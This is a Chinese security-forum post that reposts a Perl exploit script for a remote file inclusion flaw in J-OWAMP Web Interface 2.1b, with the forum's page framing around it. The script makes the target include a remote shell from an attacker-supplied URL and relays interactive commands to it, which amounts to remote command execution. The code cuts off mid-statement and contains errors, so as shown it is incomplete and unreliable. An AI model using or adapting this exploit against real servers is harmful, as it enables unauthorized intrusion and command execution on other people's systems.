‹‹ 上一主题 | 下一主题 ››
发新话题
打印

J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1117 小时 
注册时间
2007-10-23 
最后登录
2008-11-17 

资料收集奖 运营支持奖

楼主 发表于 2006-12-8 20:02  只看该作者

J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit

[code]
#!/usr/bin/perl
#  Jowamp  WebInterface v 2.1 Remote File Inclusion Vulnerablity
# Vulnerability found & Exploit [c]oded By Dr Max Virus
# Download:http://www.av.it.pt/jowamp/index ... ace_version_2_1.zip
# User Must Be Logged In!
# In a web browser open the page http://localhost/jowamp/login/register.php to register new users.


use LWP::UserAgent;

$target=@ARGV[0];
$shellsite=@ARGV[1];
$cmdv=@ARGV[2];

if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv)
{
     usg()
}
header();


while()
{
print "[Shell] \$";
while (<STDIN>)
{
     $cmd=$_;
     chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req =
HTTP::Request->new(GET=>$target.&#39;/JOWAMP_files/JOWAMP_ShowPage.php?link=&#39;.$shellsite=&#39;.?&&#39;.$cmdv.&#39;=&#39;.$cmd)or
die "\n\n Failed to Connect, Try again!\n";
$res = $xpl->request($req);
# The response of the server to the GET request we sent is stored in the
$info variable
$info = $res->content;
$info =~ tr/[\n]/[

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题